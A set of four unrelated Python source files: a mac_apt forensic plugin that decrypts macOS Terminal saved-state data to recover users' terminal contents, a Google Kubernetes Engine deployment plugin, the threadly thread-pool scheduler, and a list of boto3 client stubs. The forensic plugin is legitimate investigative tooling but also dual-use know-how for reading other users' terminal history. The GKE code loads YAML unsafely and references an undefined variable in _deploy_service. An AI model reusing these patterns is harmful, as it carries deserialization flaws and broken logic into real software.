log = logging.getLogger('MAIN.' + __Plugin_Name) # Do not rename or remove this ! This is the logger object
#---- Do not change the variable names in above section ----#
class TerminalWindowInfo():
def __init__(self, title, working_dir, content, user, source):
self.content = content
self.title = title
self.working_dir = working_dir
self.user = user
self.source = source
# self.file_created_time = ''
# self.file_modified_time = ''
def PrintAll(terminals, output_params):
terminal_info = [ ('Title',DataType.TEXT),('WorkingDir',DataType.TEXT),('Content',DataType.TEXT),
('User', DataType.TEXT),('Source',DataType.TEXT)
]
log.info (str(len(terminals)) + " terminal saved state(s) found")
terminals_list = []
for t in terminals:
t_item = [ t.title, t.working_dir, t.content,
t.user, t.source
]
terminals_list.append(t_item)
WriteList("terminal saved state", "TerminalState", terminals_list, terminal_info, output_params, '')
def get_decoded_plist_data(data):
data_size = len(data)
name = ''
if data_size > 8:
name_len = struct.unpack('>I', data[4:8])[0]
name = data[8 : 8 + name_len]
log.debug('NSName = {}'.format(name))
rchv = data[8 + name_len : 12 + name_len] # "rchv"
if rchv != b"rchv":
log.warning('magic was not "rchv", it was {}'.format(str(rchv)))
nsa_plist_len = struct.unpack('>I', data[12 + name_len : 16 + name_len])[0]
nsa_plist = data[16 + name_len : 16 + name_len + nsa_plist_len]
f = io.BytesIO(nsa_plist)
try:
deserialized_plist = nd.deserialize_plist(f)
except (nd.DeserializeError, nd.biplist.NotBinaryPlistException,
nd.biplist.InvalidPlistException,plistlib.InvalidFileException,
nd.ccl_bplist.BplistError, ValueError, TypeError,
OSError, OverflowError) as ex:
log.exception("")
f.close()
return (name, None)
f.close()
return (name, deserialized_plist)
else:
log.warning('Plist seems empty!')
return (name, None)
def get_key_for_window_id(plist, ns_window_id):
key = None
for item in plist:
w_id = item.get('NSWindowID', None)
if w_id == ns_window_id:
key = item.get('NSDataKey', None)
if key == None:
log.error("Error fetching key, key was not found for windowID={}!".format(ns_window_id))
break
return key
def decrypt(enc_data, key, iv):
'''Decrypts the data given encrypted data, key and IV'''
try:
cipher = AES.new(key, AES.MODE_CBC, iv)
dec_data = cipher.decrypt(enc_data)
return dec_data
except (KeyError, ValueError) as ex:
log.exception('Decryption error:')
return b''
def ParseTerminalPlist_NSWindow(plist):
'''Returns terminal (Title, Working Dir, Contents) as a tuple'''
title = ''
working_dir = ''
contents = ''
if isinstance(plist, dict):
return # not a list
try:
for item in plist:
for k, v in item.items():
if k == 'NSTitle':
title = v
elif k == 'TTWindowState':
window_settings = v.get('Window Settings', None)
if not window_settings: continue
for w in window_settings:
for key, value in w.items():
if key in ('Tab Contents', 'Tab Contents v2'):
for content in value:
if isinstance(content, bytes):
contents += content.decode('utf8', 'backslashreplace')
elif key in ('Tab Working Directory URL String', 'Tab Working Directory URL'):
working_dir = value
except ValueError as ex:
log.error("Error reading terminal plist, error was: {}".format(str(ex)))
return (title, working_dir, contents)
def ProcessFile(windows_plist_file_path, data_file_path, terminals):
success, windows_plist, error = CommonFunctions.ReadPlist(windows_plist_file_path)
if success:
with open(data_file_path, 'rb') as f:
all_data = f.read() # Should be a small file
Process(windows_plist, all_data, terminals, '', data_file_path)
else:
log.error(f"Error reading plist - {windows_plist_file_path}. Error={error}")
def AddUnique(terminal_info, terminals):
duplicate_found = False
for t in terminals:
if (t.source == terminal_info.source) and \
(t.user == terminal_info.user) and \
(t.working_dir == terminal_info.working_dir) and \
(t.content == terminal_info.content) and \
(t.title == terminal_info.title):
duplicate_found = True
break
if not duplicate_found:
terminals.append(terminal_info)
def Process(windows_plist, all_data, terminals, user, data_source):
iv = struct.pack("<IIII", 0, 0, 0, 0)
if windows_plist:
pos = 0
# Parsing data.data
size_data = len(all_data)
while (pos + 16) < size_data:
magic = all_data[pos:pos+8]
ns_window_id, rec_length = struct.unpack(">II", all_data[pos+8:pos+16])
pos += 16
rec_length -= 16
if (pos + rec_length) <= size_data:
enc_data = all_data[pos:pos + rec_length]
if magic != b"NSCR1000":
log.error("Unknown header:" + str(magic))
key = get_key_for_window_id(windows_plist, ns_window_id)
if key:
dec_data = decrypt(enc_data, key, iv)
data_name, new_data = get_decoded_plist_data(dec_data)
if new_data and data_name == b'_NSWindow':
title, working_dir, contents = ParseTerminalPlist_NSWindow(new_data)
if not(len(contents) == 0 and len(working_dir) == 0 and len(title) == 0):
t = TerminalWindowInfo(title, working_dir, contents, user, data_source)
#terminals.append(t)
AddUnique(t, terminals)
else:
print('key not found for window_id={}'.format(ns_window_id))
pos += rec_length
def Plugin_Start(mac_info):
'''Main Entry point function for plugin'''
processed_paths = []
terminals = []
saved_state_path = '{}/Library/Saved Application State/com.apple.Terminal.savedState'
for user in mac_info.users:
if user.home_dir == '/private/var/empty': continue # Optimization, nothing should be here!
elif user.home_dir == '/private/var/root': user_name = 'root' # Some other users use the same root folder, we will list all such users as 'root', as there is no way to tell
if user.home_dir in processed_paths: continue # Avoid processing same folder twice (some users have same folder! (Eg: root & daemon))
processed_paths.append(user.home_dir)
source_path = saved_state_path.format(user.home_dir)
windows_plist_path = source_path + '/windows.plist'
data_path = source_path + '/data.data'
if mac_info.IsValidFolderPath(source_path) and mac_info.IsValidFilePath(windows_plist_path) and mac_info.IsValidFilePath(data_path):
mac_info.ExportFile(windows_plist_path, __Plugin_Name, user.user_name + "_", False)
mac_info.ExportFile(data_path, __Plugin_Name, user.user_name + "_", False)
success, windows_plist, error = mac_info.ReadPlist(windows_plist_path)
if success:
try:
all_data_file = mac_info.Open(data_path)
if (all_data_file):
all_data = all_data_file.read()
Process(windows_plist, all_data, terminals, user.user_name, data_path)
else:
log.error('Failed to open data.data file - {}'.format(data_path))
except (ValueError, OSError):
log.exception('')
else:
log.error('Failed to open windows.plist: {}'.format(windows_plist_path))
if len(terminals) > 0:
PrintAll(terminals, mac_info.output_params)
else:
log.info('No Terminal saved state found')
def Plugin_Start_Standalone(input_files_list, output_params):
'''Main entry point function when used on single artifacts (mac_apt_singleplugin), not on a full disk image'''
log.info("Module Started as standalone")
terminals = []
for input_path in input_files_list:
log.debug("Input folder passed was: " + input_path)
if os.path.isdir(input_path):
windows_plist_path = os.path.join(input_path, 'windows.plist')
data_path = os.path.join(input_path, 'data.data')
ProcessFile(windows_plist_path, data_path, terminals)
else:
log.error('Input path "{}" is not a folder. Provide the input path to folder com.apple.Terminal.savedState'.format(input_path))
if len(terminals) > 0:
PrintAll(terminals, output_params)
else:
log.info('No Terminal saved state found')
def Plugin_Start_Ios(ios_info):
'''Entry point for ios_apt plugin'''
pass
if __name__ == '__main__':
print ("This plugin is a part of a framework and does not run independently on its own!")
| |
import ast
import os
from os.path import expanduser
import shutil
import time
import yaml
from kubernetes import client, config
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
from server.common import constants
from server.common import common_functions
from server.common import docker_lib
from server.common import exceptions
from server.common import fm_logger
from server.dbmodule.objects import app as app_db
from server.dbmodule.objects import environment as env_db
from server.dbmodule.objects import resource as res_db
import server.server_plugins.app_base as app_base
import gke_app_base
from server.server_plugins.gcloud import gcloud_helper
home_dir = expanduser("~")
APP_AND_ENV_STORE_PATH = ("{home_dir}/.cld/data/deployments/").format(home_dir=home_dir)
fmlogger = fm_logger.Logging()
GCR = "us.gcr.io"
class GKEMultiContainer(gke_app_base.GKEAppBase):
gcloudhelper = gcloud_helper.GCloudHelper()
def __init__(self):
credentials = GoogleCredentials.get_application_default()
self.gke_service = discovery.build('container', 'v1',
credentials=credentials)
self.compute_service = discovery.build('compute', 'v1',
credentials=credentials,
cache_discovery=False)
self.docker_handler = docker_lib.DockerLib()
self.app_yaml_def = ''
def _check_if_pod_or_more(self, app_id, app_info):
only_pod = True
kind_list = []
app_dir = app_info['app_location']
app_folder_name = app_info['app_folder_name']
df_dir = app_dir + "/" + app_folder_name
app_yaml = app_info['app_yaml']
stream = open(df_dir + "/" + app_yaml, "r")
docs = yaml.load_all(stream)
for doc in docs:
for k,v in doc.items():
if k == 'kind':
kind_list.append(v.strip())
if 'Service' in kind_list or 'Deployment' in kind_list:
only_pod = False
return only_pod
def _get_pod_name(self, app_info):
app_yaml = common_functions.read_app_yaml(app_info)
pod_name = app_yaml['metadata']['name']
return pod_name
def _get_container_port(self, app_info):
container_port = ''
app_dir = app_info['app_location']
app_folder_name = app_info['app_folder_name']
app_yaml_dir = app_dir + "/" + app_folder_name
app_yaml = app_info['app_yaml']
app_yaml_file = app_yaml_dir + "/" + app_yaml
fp = open(app_yaml_file, "r")
for line in fp.readlines():
if line.find("containerPort") >= 0:
parts = line.split("containerPort:")
container_port = parts[1].strip()
break
return container_port
def _deploy_pod(self, app_id, app_info):
df_file = self._get_kube_df_file(app_info)
app_data = {}
kubernetes_yaml = app_info['app_yaml']
pod_name = self._get_pod_name(app_info)
service_name = pod_name
container_port = self._get_container_port(app_info)
if not container_port:
container_port = 80
df_file = df_file + ("\n"
"WORKDIR /src \n"
"RUN kubectl create -f {kubernetes_yaml} \ \n"
" && kubectl expose pod {pod_name} --name {service_name} --type LoadBalancer --port 80 --target-port={container_port} --protocol TCP").format(
kubernetes_yaml=kubernetes_yaml,
pod_name=pod_name,
service_name=service_name,
container_port=container_port
)
cont_name = app_info['app_name'] + "-deploy"
app_dir = app_info['app_location']
app_folder_name = app_info['app_folder_name']
df_dir = app_dir + "/" + app_folder_name
df_name = df_dir + "/Dockerfile.deploy"
fp = open(df_name, "w")
fp.write(df_file)
fp.close()
err, output = self.docker_handler.build_container_image(
cont_name,
df_name,
df_context=df_dir
)
if err:
error_output = common_functions.filter_error_output(output)
error_msg = ("Error encountered in building Dockerfile.deploy {e}").format(e=err)
error_msg = error_msg + " " + error_output
fmlogger.error(error_msg)
raise exceptions.AppDeploymentFailure(error_msg)
app_details = {}
app_url, status = self._check_if_app_is_ready(app_id,
service_name,
app_details)
app_data['status'] = status
app_details['app_url'] = app_url
app_details['pod_name'] = [pod_name]
app_details['service_name'] = service_name
app_details['app_folder_name'] = app_info['app_folder_name']
app_details['env_name'] = app_info['env_name']
app_data['output_config'] = str(app_details)
app_db.App().update(app_id, app_data)
self.docker_handler.remove_container_image(cont_name)
def _deploy_service(self, app_id, app_info):
app_data['status'] = 'File format not supported. Check https://github.com/cloud-ark/cloudark/issues/200'
app_db.App().update(app_id, app_data)
def _deploy(self, app_id, app_info):
only_pod_defined = self._check_if_pod_or_more(app_id, app_info)
if only_pod_defined:
self._deploy_pod(app_id, app_info)
else:
self._deploy_service(app_id, app_info)
def deploy_application(self, app_id, app_info):
fmlogger.debug("Deploying application %s" % app_info['app_name'])
self._copy_creds(app_info)
app_data = {}
app_data['status'] = 'setting-up-kubernetes-config'
app_db.App().update(app_id, app_data)
try:
self._setup_kube_config(app_info)
except Exception as e:
fmlogger.error("Exception encountered in obtaining kube config %s" % e)
app_db.App().update(app_id, {'status': str(e)})
# Resolve environment
common_functions.resolve_environment_multicont(app_id, app_info)
app_details = {}
app_data = {}
app_data['status'] = 'deploying'
app_db.App().update(app_id, app_data)
try:
self._deploy(app_id, app_info)
fmlogger.debug("Done deploying application %s" % app_info['app_name'])
except exceptions.AppDeploymentFailure as e:
fmlogger.error(str(e))
app_data['status'] = 'deployment-failed ' + str(e) + " " + e.get_message()
app_db.App().update(app_id, app_data)
def redeploy_application(self, app_id, app_info):
pass
def delete_application(self, app_id, app_info):
fmlogger.debug("Deleting application %s" % app_info['app_name'])
app_obj = app_db.App().get(app_id)
try:
app_output_config = ast.literal_eval(app_obj.output_config)
self._delete_service(app_info, app_output_config['service_name'])
pod_name_list = app_output_config['pod_name']
for pod in pod_name_list:
self._delete_pod(app_info, pod)
except Exception as e:
fmlogger.error(e)
app_db.App().delete(app_id)
fmlogger.debug("Done deleting application %s" % app_info['app_name'])
def get_logs(self, app_id, app_info):
fmlogger.debug("Retrieving logs for application %s %s" % (app_id, app_info['app_name']))
app_obj = app_db.App().get(app_id)
output_config = ast.literal_eval(app_obj.output_config)
pod_name_list = output_config['pod_name']
log_list = []
for pod in pod_name_list:
logs_path_list = self._retrieve_logs(app_info, pod, app_name=app_info['app_name'])
log_list.extend(logs_path_list)
return log_list
| |
"""
threadly a simple threadpool and scheduler for python.
"""
import threading
import logging
try:
from Queue import Queue
from Queue import Empty as EmptyException
except:
from queue import Queue, Empty as EmptyException
from threadly.Structures import SortedLockingList
from threadly.KeyedExecutor import KeyedExecutor
from threadly.Futures import ListenableFuture
from threadly.Futures import future_job
from threadly.Clock import Clock
try:
xrange(1)
except:
xrange = range
class Scheduler(object):
"""
Main Scheduler Object.
"""
def __init__(self, poolsize):
"""
Construct an Scheduler instance with the set thread pool size.
`poolsize` positive integer for the number of threads you want
in this pool .
"""
self.__log = logging.getLogger("root.threadly")
self.__clock = Clock()
self.__key_lock = threading.Condition()
self.__poolsize = poolsize
self.__running = True
self.__in_shutdown = False
self.__main_queue = Queue()
self.__delayed_tasks = SortedLockingList()
self.__in_delay = False
self.__threads = list()
self.__delay_lock = threading.Condition()
self.__keys = dict()
for i in xrange(self.__poolsize):
tmp_thread = threading.Thread(target=self.__thread_pool)
tmp_thread.name = "Executor-Pool-Thread-%d" % (i)
tmp_thread.daemon = True
tmp_thread.start()
self.__threads.append(tmp_thread)
def get_poolsize(self):
"""
Returns the number of threads used in this Pool.
"""
return len(self.__threads)
def get_queue_size(self):
"""
Returns the number of items currently awaiting Execution.
"""
return self.__main_queue.qsize()
def execute(self, task, args=None, kwargs=None):
"""
Execute a given task as soon as possible.
`task` is a callable to be called on the Scheduler.
`args` are the arguments to pass to the callable when called.
`kwargs` are the keyword args to be passed to the callable when called.
"""
args = args or ()
kwargs = kwargs or {}
self.schedule(task, args=args, kwargs=kwargs)
def schedule_with_future(self, task, delay=0, key=None, args=None, kwargs=None):
"""
Returns a `ListenableFuture` for this task. Once the task is
completed the future will also be completed. This works pretty much
exactly like `schedule` except you can not make a task recurring.
`task` is a callable to be called on the Scheduler.
`delay` this is the time to wait (in milliseconds!!) before scheduler
will call the passed task.
`key` this is any python object to use as a key. All tasks using
this key will be ran in a single threaded manor.
`args` are the arguments to pass to the callable when called.
`kwargs` are the keyword args to be passed to the callable when called.
"""
args = args or ()
kwargs = kwargs or {}
job = (task, args, kwargs)
future = ListenableFuture()
self.schedule(future_job, delay=delay, key=key, args=(future, job))
return future
def schedule(self, task, delay=0, recurring=False, key=None, args=None, kwargs=None):
"""
This schedules a task to be executed. It can be delayed, and set
to a key. It can also be marked as recurring.
`task` is a callable to be called on the Scheduler.
`delay` this is the time to wait (in milliseconds!!) before scheduler
will call the passed task.
`recurring` set this to True if this should be a recurring.
You should be careful that delay is > 0 when setting this to True.
`key` this is any python object to use as a key. All tasks using this
key will be ran in a single threaded manor.
`args` are the arguments to pass to the callable when called.
`kwargs` are the keyword args to be passed to the callable when called.
"""
args = args or ()
kwargs = kwargs or {}
if delay > 0:
s_task = int(self.__clock.accurate_time() * 1000) + delay
send = False
if delay / 1000.0 <= self.__get_next_wait_time():
send = True
self.__delayed_tasks.add((s_task, task, delay, recurring, key, args, kwargs))
if send:
self.__main_queue.put((self.__empty, (), {}))
else:
if key is not None:
self.__key_lock.acquire()
if key not in self.__keys:
tmp = KeyedExecutor()
self.__keys[key] = tmp
self.__key_lock.release()
run_key = self.__keys[key]
run_key.add((task, args, kwargs))
run_key.lock.acquire()
if not run_key.in_queue and run_key.size() > 0:
run_key.in_queue = True
self.__main_queue.put((run_key.run_all, (), {}))
run_key.lock.release()
else:
self.__main_queue.put((task, args, kwargs))
def remove(self, task):
"""
Remove a scheduled task from the queue. This is a best effort remove,
the task could still possibly run. This is most useful to cancel
recurring tasks. If there is more then one task with this callable
scheduled only the first one is removed.
`task` callable task to remove from the scheduled tasks list.
"""
count = 0
found = False
for tasks in self.__delayed_tasks.safeIterator():
if tasks[1] == task:
found = True
break
else:
count += 1
if found:
self.__delayed_tasks.pop(count)
return True
return False
def shutdown(self):
"""
Shuts down the threadpool. Any task currently on the queue will be
ran, but all Scheduled tasks will removed and no more tasks can be
added.
"""
self.__running = False
self.__delayed_tasks.clear()
return self.schedule_with_future(self.shutdown_now)
def shutdown_now(self):
"""
Shuts down the threadpool. Any task currently being executed will
still complete, but the queue will be emptied out.
"""
self.__running = False
self.__delayed_tasks.clear()
while not self.__main_queue.empty():
try:
self.__main_queue.get_nowait()
except:
pass
self.__internal_shutdown()
def __internal_shutdown(self):
self.__running = False
for tmp_thread in self.__threads:
if tmp_thread is not None and tmp_thread.is_alive() and threading is not None and tmp_thread != threading.current_thread():
self.__main_queue.put((self.__empty, (), {}))
self.__main_queue.put((self.__empty, (), {}))
self.__main_queue.put((self.__empty, (), {}))
self.__main_queue.put((self.__empty, (), {}))
def __empty(self):
pass
def __get_next_wait_time(self):
tmp = self.__delayed_tasks.peek()
if tmp is None or self.__delayed_tasks.size() == 0:
return 3600
else:
task = tmp[0] - int(self.__clock.accurate_time() * 1000)
return (task / 1000.0) - .0005
def __check_delay_queue(self):
dl = self.__delayed_tasks.lock()
if dl:
try:
time_out = self.__get_next_wait_time()
while time_out <= 0:
run_task = self.__delayed_tasks.pop(0)
self.schedule(run_task[1], key=run_task[4], args=run_task[5], kwargs=run_task[6])
#run_task[3] is recurring, if so we add again as a scheduled event
if run_task[3] == True and not self.__in_shutdown:
self.schedule(run_task[1], run_task[2], run_task[3], run_task[4], run_task[5], run_task[6])
time_out = self.__get_next_wait_time()
finally:
self.__delayed_tasks.unlock()
return dl
def __thread_pool(self):
while self.__running:
try:
runner = None
time_out = self.__get_next_wait_time()
if time_out <= 0 and self.__check_delay_queue():
time_out = self.__get_next_wait_time()
if time_out <= 0:
time_out = 5
runner = self.__main_queue.get(True, time_out)
if runner is not None:
runner[0](*runner[1], **runner[2])
except IndexError as exp:
pass
except EmptyException as exp:
pass
except Exception as exp:
if runner is not None:
self.__log.error("Exception while Executing function:\"{}\" with args:\"{}\" and kwargs:\"{}\"".format(runner[0].__name__, runner[1],runner[2]))
self.__log.exception(exp)
| |
import boto3
accessanalyzer = boto3.client("accessanalyzer")
""":type : pyboto3.accessanalyzer"""
acm = boto3.client("acm")
""":type : pyboto3.acm"""
acm_pca = boto3.client("acm-pca")
""":type : pyboto3.acm_pca"""
alexaforbusiness = boto3.client("alexaforbusiness")
""":type : pyboto3.alexaforbusiness"""
amplify = boto3.client("amplify")
""":type : pyboto3.amplify"""
apigateway = boto3.client("apigateway")
""":type : pyboto3.apigateway"""
apigatewaymanagementapi = boto3.client("apigatewaymanagementapi")
""":type : pyboto3.apigatewaymanagementapi"""
apigatewayv2 = boto3.client("apigatewayv2")
""":type : pyboto3.apigatewayv2"""
appconfig = boto3.client("appconfig")
""":type : pyboto3.appconfig"""
application_autoscaling = boto3.client("application-autoscaling")
""":type : pyboto3.application_autoscaling"""
application_insights = boto3.client("application-insights")
""":type : pyboto3.application_insights"""
appmesh = boto3.client("appmesh")
""":type : pyboto3.appmesh"""
appstream = boto3.client("appstream")
""":type : pyboto3.appstream"""
appsync = boto3.client("appsync")
""":type : pyboto3.appsync"""
athena = boto3.client("athena")
""":type : pyboto3.athena"""
autoscaling = boto3.client("autoscaling")
""":type : pyboto3.autoscaling"""
autoscaling_plans = boto3.client("autoscaling-plans")
""":type : pyboto3.autoscaling_plans"""
backup = boto3.client("backup")
""":type : pyboto3.backup"""
batch = boto3.client("batch")
""":type : pyboto3.batch"""
budgets = boto3.client("budgets")
""":type : pyboto3.budgets"""
ce = boto3.client("ce")
""":type : pyboto3.ce"""
chime = boto3.client("chime")
""":type : pyboto3.chime"""
cloud9 = boto3.client("cloud9")
""":type : pyboto3.cloud9"""
clouddirectory = boto3.client("clouddirectory")
""":type : pyboto3.clouddirectory"""
cloudformation = boto3.client("cloudformation")
""":type : pyboto3.cloudformation"""
cloudfront = boto3.client("cloudfront")
""":type : pyboto3.cloudfront"""
cloudhsm = boto3.client("cloudhsm")
""":type : pyboto3.cloudhsm"""
cloudhsmv2 = boto3.client("cloudhsmv2")
""":type : pyboto3.cloudhsmv2"""
cloudsearch = boto3.client("cloudsearch")
""":type : pyboto3.cloudsearch"""
cloudsearchdomain = boto3.client("cloudsearchdomain")
""":type : pyboto3.cloudsearchdomain"""
cloudtrail = boto3.client("cloudtrail")
""":type : pyboto3.cloudtrail"""
cloudwatch = boto3.client("cloudwatch")
""":type : pyboto3.cloudwatch"""
codebuild = boto3.client("codebuild")
""":type : pyboto3.codebuild"""
codecommit = boto3.client("codecommit")
""":type : pyboto3.codecommit"""
codedeploy = boto3.client("codedeploy")
""":type : pyboto3.codedeploy"""
codeguru_reviewer = boto3.client("codeguru-reviewer")
""":type : pyboto3.codeguru_reviewer"""
codeguruprofiler = boto3.client("codeguruprofiler")
""":type : pyboto3.codeguruprofiler"""
codepipeline = boto3.client("codepipeline")
""":type : pyboto3.codepipeline"""
codestar = boto3.client("codestar")
""":type : pyboto3.codestar"""
codestar_connections = boto3.client("codestar-connections")
""":type : pyboto3.codestar_connections"""
codestar_notifications = boto3.client("codestar-notifications")
""":type : pyboto3.codestar_notifications"""
cognito_identity = boto3.client("cognito-identity")
""":type : pyboto3.cognito_identity"""
cognito_idp = boto3.client("cognito-idp")
""":type : pyboto3.cognito_idp"""
cognito_sync = boto3.client("cognito-sync")
""":type : pyboto3.cognito_sync"""
comprehend = boto3.client("comprehend")
""":type : pyboto3.comprehend"""
comprehendmedical = boto3.client("comprehendmedical")
""":type : pyboto3.comprehendmedical"""
compute_optimizer = boto3.client("compute-optimizer")
""":type : pyboto3.compute_optimizer"""
config = boto3.client("config")
""":type : pyboto3.config"""
connect = boto3.client("connect")
""":type : pyboto3.connect"""
connectparticipant = boto3.client("connectparticipant")
""":type : pyboto3.connectparticipant"""
cur = boto3.client("cur")
""":type : pyboto3.cur"""
dataexchange = boto3.client("dataexchange")
""":type : pyboto3.dataexchange"""
datapipeline = boto3.client("datapipeline")
""":type : pyboto3.datapipeline"""
datasync = boto3.client("datasync")
""":type : pyboto3.datasync"""
dax = boto3.client("dax")
""":type : pyboto3.dax"""
detective = boto3.client("detective")
""":type : pyboto3.detective"""
devicefarm = boto3.client("devicefarm")
""":type : pyboto3.devicefarm"""
directconnect = boto3.client("directconnect")
""":type : pyboto3.directconnect"""
discovery = boto3.client("discovery")
""":type : pyboto3.discovery"""
dlm = boto3.client("dlm")
""":type : pyboto3.dlm"""
dms = boto3.client("dms")
""":type : pyboto3.dms"""
docdb = boto3.client("docdb")
""":type : pyboto3.docdb"""
ds = boto3.client("ds")
""":type : pyboto3.ds"""
dynamodb = boto3.client("dynamodb")
""":type : pyboto3.dynamodb"""
dynamodbstreams = boto3.client("dynamodbstreams")
""":type : pyboto3.dynamodbstreams"""
ebs = boto3.client("ebs")
""":type : pyboto3.ebs"""
ec2 = boto3.client("ec2")
""":type : pyboto3.ec2"""
ec2_instance_connect = boto3.client("ec2-instance-connect")
""":type : pyboto3.ec2_instance_connect"""
ecr = boto3.client("ecr")
""":type : pyboto3.ecr"""
ecs = boto3.client("ecs")
""":type : pyboto3.ecs"""
efs = boto3.client("efs")
""":type : pyboto3.efs"""
eks = boto3.client("eks")
""":type : pyboto3.eks"""
elastic_inference = boto3.client("elastic-inference")
""":type : pyboto3.elastic_inference"""
elasticache = boto3.client("elasticache")
""":type : pyboto3.elasticache"""
elasticbeanstalk = boto3.client("elasticbeanstalk")
""":type : pyboto3.elasticbeanstalk"""
elastictranscoder = boto3.client("elastictranscoder")
""":type : pyboto3.elastictranscoder"""
elb = boto3.client("elb")
""":type : pyboto3.elb"""
elbv2 = boto3.client("elbv2")
""":type : pyboto3.elbv2"""
emr = boto3.client("emr")
""":type : pyboto3.emr"""
es = boto3.client("es")
""":type : pyboto3.es"""
events = boto3.client("events")
""":type : pyboto3.events"""
firehose = boto3.client("firehose")
""":type : pyboto3.firehose"""
fms = boto3.client("fms")
""":type : pyboto3.fms"""
forecast = boto3.client("forecast")
""":type : pyboto3.forecast"""
forecastquery = boto3.client("forecastquery")
""":type : pyboto3.forecastquery"""
frauddetector = boto3.client("frauddetector")
""":type : pyboto3.frauddetector"""
fsx = boto3.client("fsx")
""":type : pyboto3.fsx"""
gamelift = boto3.client("gamelift")
""":type : pyboto3.gamelift"""
glacier = boto3.client("glacier")
""":type : pyboto3.glacier"""
globalaccelerator = boto3.client("globalaccelerator")
""":type : pyboto3.globalaccelerator"""
glue = boto3.client("glue")
""":type : pyboto3.glue"""
greengrass = boto3.client("greengrass")
""":type : pyboto3.greengrass"""
groundstation = boto3.client("groundstation")
""":type : pyboto3.groundstation"""
guardduty = boto3.client("guardduty")
""":type : pyboto3.guardduty"""
health = boto3.client("health")
""":type : pyboto3.health"""
iam = boto3.client("iam")
""":type : pyboto3.iam"""
imagebuilder = boto3.client("imagebuilder")
""":type : pyboto3.imagebuilder"""
importexport = boto3.client("importexport")
""":type : pyboto3.importexport"""
inspector = boto3.client("inspector")
""":type : pyboto3.inspector"""
iot = boto3.client("iot")
""":type : pyboto3.iot"""
iot_data = boto3.client("iot-data")
""":type : pyboto3.iot_data"""
iot_jobs_data = boto3.client("iot-jobs-data")
""":type : pyboto3.iot_jobs_data"""
iot1click_devices = boto3.client("iot1click-devices")
""":type : pyboto3.iot1click_devices"""
iot1click_projects = boto3.client("iot1click-projects")
""":type : pyboto3.iot1click_projects"""
iotanalytics = boto3.client("iotanalytics")
""":type : pyboto3.iotanalytics"""
iotevents = boto3.client("iotevents")
""":type : pyboto3.iotevents"""
iotevents_data = boto3.client("iotevents-data")
""":type : pyboto3.iotevents_data"""
iotsecuretunneling = boto3.client("iotsecuretunneling")
""":type : pyboto3.iotsecuretunneling"""
iotsitewise = boto3.client("iotsitewise")
""":type : pyboto3.iotsitewise"""
iotthingsgraph = boto3.client("iotthingsgraph")
""":type : pyboto3.iotthingsgraph"""
kafka = boto3.client("kafka")
""":type : pyboto3.kafka"""
kendra = boto3.client("kendra")
""":type : pyboto3.kendra"""
kinesis = boto3.client("kinesis")
""":type : pyboto3.kinesis"""
kinesis_video_archived_media = boto3.client("kinesis-video-archived-media")
""":type : pyboto3.kinesis_video_archived_media"""
kinesis_video_media = boto3.client("kinesis-video-media")
""":type : pyboto3.kinesis_video_media"""
kinesis_video_signaling = boto3.client("kinesis-video-signaling")
""":type : pyboto3.kinesis_video_signaling"""
kinesisanalytics = boto3.client("kinesisanalytics")
""":type : pyboto3.kinesisanalytics"""
kinesisanalyticsv2 = boto3.client("kinesisanalyticsv2")
""":type : pyboto3.kinesisanalyticsv2"""
kinesisvideo = boto3.client("kinesisvideo")
""":type : pyboto3.kinesisvideo"""
kms = boto3.client("kms")
""":type : pyboto3.kms"""
lakeformation = boto3.client("lakeformation")
""":type : pyboto3.lakeformation"""
lambda_ = boto3.client("lambda")
""":type : pyboto3.lambda_"""
lex_models = boto3.client("lex-models")
""":type : pyboto3.lex_models"""
lex_runtime = boto3.client("lex-runtime")
""":type : pyboto3.lex_runtime"""
license_manager = boto3.client("license-manager")
""":type : pyboto3.license_manager"""
lightsail = boto3.client("lightsail")
""":type : pyboto3.lightsail"""
logs = boto3.client("logs")
""":type : pyboto3.logs"""
machinelearning = boto3.client("machinelearning")
""":type : pyboto3.machinelearning"""
macie = boto3.client("macie")
""":type : pyboto3.macie"""
macie2 = boto3.client("macie2")
""":type : pyboto3.macie2"""
managedblockchain = boto3.client("managedblockchain")
""":type : pyboto3.managedblockchain"""
marketplace_catalog = boto3.client("marketplace-catalog")
""":type : pyboto3.marketplace_catalog"""
marketplace_entitlement = boto3.client("marketplace-entitlement")
""":type : pyboto3.marketplace_entitlement"""
marketplacecommerceanalytics = boto3.client("marketplacecommerceanalytics")
""":type : pyboto3.marketplacecommerceanalytics"""
mediaconnect = boto3.client("mediaconnect")
""":type : pyboto3.mediaconnect"""
mediaconvert = boto3.client("mediaconvert")
""":type : pyboto3.mediaconvert"""
medialive = boto3.client("medialive")
""":type : pyboto3.medialive"""
mediapackage = boto3.client("mediapackage")
""":type : pyboto3.mediapackage"""
mediapackage_vod = boto3.client("mediapackage-vod")
""":type : pyboto3.mediapackage_vod"""
mediastore = boto3.client("mediastore")
""":type : pyboto3.mediastore"""
mediastore_data = boto3.client("mediastore-data")
""":type : pyboto3.mediastore_data"""
mediatailor = boto3.client("mediatailor")
""":type : pyboto3.mediatailor"""
meteringmarketplace = boto3.client("meteringmarketplace")
""":type : pyboto3.meteringmarketplace"""
mgh = boto3.client("mgh")
""":type : pyboto3.mgh"""
migrationhub_config = boto3.client("migrationhub-config")
""":type : pyboto3.migrationhub_config"""
mobile = boto3.client("mobile")
""":type : pyboto3.mobile"""
mq = boto3.client("mq")
""":type : pyboto3.mq"""
mturk = boto3.client("mturk")
""":type : pyboto3.mturk"""
neptune = boto3.client("neptune")
""":type : pyboto3.neptune"""
networkmanager = boto3.client("networkmanager")
""":type : pyboto3.networkmanager"""
opsworks = boto3.client("opsworks")
""":type : pyboto3.opsworks"""
opsworkscm = boto3.client("opsworkscm")
""":type : pyboto3.opsworkscm"""
organizations = boto3.client("organizations")
""":type : pyboto3.organizations"""
outposts = boto3.client("outposts")
""":type : pyboto3.outposts"""
personalize = boto3.client("personalize")
""":type : pyboto3.personalize"""
personalize_events = boto3.client("personalize-events")
""":type : pyboto3.personalize_events"""
personalize_runtime = boto3.client("personalize-runtime")
""":type : pyboto3.personalize_runtime"""
pi = boto3.client("pi")
""":type : pyboto3.pi"""
pinpoint = boto3.client("pinpoint")
""":type : pyboto3.pinpoint"""
pinpoint_email = boto3.client("pinpoint-email")
""":type : pyboto3.pinpoint_email"""
pinpoint_sms_voice = boto3.client("pinpoint-sms-voice")
""":type : pyboto3.pinpoint_sms_voice"""
polly = boto3.client("polly")
""":type : pyboto3.polly"""
pricing = boto3.client("pricing")
""":type : pyboto3.pricing"""
qldb = boto3.client("qldb")
""":type : pyboto3.qldb"""
qldb_session = boto3.client("qldb-session")
